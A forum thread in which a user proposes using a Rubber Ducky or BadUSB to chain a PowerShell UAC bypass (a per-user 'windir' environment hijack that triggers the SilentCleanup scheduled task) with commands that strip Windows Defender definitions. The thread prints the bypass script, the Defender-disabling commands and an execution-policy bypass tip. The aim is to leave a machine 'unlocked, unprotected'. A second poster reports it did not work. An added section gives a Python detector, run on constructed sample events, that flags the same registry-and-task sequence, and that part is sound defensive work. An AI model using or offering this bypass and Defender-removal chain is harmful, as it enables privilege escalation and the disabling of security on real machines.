ramirez.r1214 Posted May 24, 2019

So I had an idea recently. Not sure if it'll work, don't bash me on it, but I was thinking about combining some of Darren's videos and using a bad USB or a Rubber Ducky to not only bypass UAC but turn off Defender. I've been trying this for some time now on my VirtualBox and Windows 10 laptop. In one of his videos he shows Promptless UAC Bypass & Powershell Privilege Escalation.

~~~~~~~~~~~~~~~~~~~~~
if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) {
    #Payload goes here
    #It'll run as Administrator
} else {
    $registryPath = "HKCU:\Environment"
    $Name = "windir"
    $Value = "powershell -ep bypass -w h $PSCommandPath;#"
    Set-ItemProperty -Path $registryPath -Name $name -Value $Value
    #Depending on the performance of the machine, some sleep time may be required before or after schtasks
    schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I | Out-Null
    Remove-ItemProperty -Path $registryPath -Name $name
}
~~~~~~~~~~~~~~~~~~~~~~

(What I have learned from running this in Notepad and then saving it as uac.ps1: before executing uac.ps1 you need to run "Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass" and select yes to avoid the "script is not signed" error.)

Also, the code from Disabling Defender With Viss Episode 1 showed

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"c\program files\windows defender\mpcmdrun.exe" -RemoveDefinitions -All
set-MpPreference -DisableIOVProtection $true
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

disabling Defender, but it needs to be run in the admin CMD. What I am thinking here is somehow coding a Rubber Ducky to first bypass UAC and then disable Windows Defender. That way you can begin and have fun with your unlocked, unprotected machine. Once again, just an idea; I have no clue if it's possible or makes sense. But I'd really love to try.

xaveedra Posted November 10, 2019

It's a brilliant idea but unfortunately it didn't work, at least for me. I think the problem is that the options weren't written in a proper way, and the path too. It might work after modifying.
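
A defender's view of the sequence in the first post (a per-user `windir` value written under `HKCU:\Environment`, then `schtasks /run` of SilentCleanup), as an added example that is not part of the thread or of the videos it cites. It assumes Sysmon-style registry and process-creation events are being collected; the field names, the 60-second window and the sample events are constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# HKCU\Environment as Sysmon records it: HKU\<SID>\Environment\<name>
ENV_OVERRIDE = re.compile(r"^HKU\\[^\\]+\\Environment\\(windir|systemroot)$", re.I)
TASK_RUN = re.compile(r"schtasks(\.exe)?\b.*/run\b.*SilentCleanup", re.I)
WINDOW = timedelta(seconds=60)  # assumed correlation window

# Constructed events (not real telemetry); field names are simplified and hypothetical.
# id 13 = registry value set, id 1 = process creation.
SAMPLE_EVENTS = [
    {"id": 13, "time": "2019-05-24 10:00:01", "user": "LAB\\alice",
     "target": r"HKU\S-1-5-21-1-2-3-1001\Environment\TEMP"},
    {"id": 1, "time": "2019-05-24 10:01:00", "user": "LAB\\alice",
     "cmdline": r"schtasks /query /tn \Microsoft\Windows\DiskCleanup\SilentCleanup"},
    {"id": 13, "time": "2019-05-24 10:05:00", "user": "LAB\\bob",
     "target": r"HKU\S-1-5-21-1-2-3-1002\Environment\windir"},
    {"id": 1, "time": "2019-05-24 10:05:02", "user": "LAB\\bob",
     "cmdline": r"schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I"},
    {"id": 1, "time": "2019-05-24 11:00:00", "user": "LAB\\carol",
     "cmdline": r"schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup"},
]

def _ts(event):
    return datetime.strptime(event["time"], "%Y-%m-%d %H:%M:%S")

def detect(events):
    """Return (severity, user, time, reason) tuples in time order."""
    alerts, last_override = [], {}
    for ev in sorted(events, key=_ts):
        when, user = _ts(ev), ev["user"]
        if ev["id"] == 13 and ENV_OVERRIDE.match(ev.get("target", "")):
            # A per-user value shadowing a system path variable is rarely legitimate.
            last_override[user] = when
            alerts.append(("medium", user, ev["time"], "per-user windir/systemroot set"))
        elif ev["id"] == 1 and TASK_RUN.search(ev.get("cmdline", "")):
            seen = last_override.get(user)
            if seen is not None and when - seen <= WINDOW:
                alerts.append(("high", user, ev["time"], "SilentCleanup run after override"))
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The registry write alone raises a medium alert because the script in the post deletes the value right after the task runs, so a point-in-time registry check can miss it while the write event remains in the log.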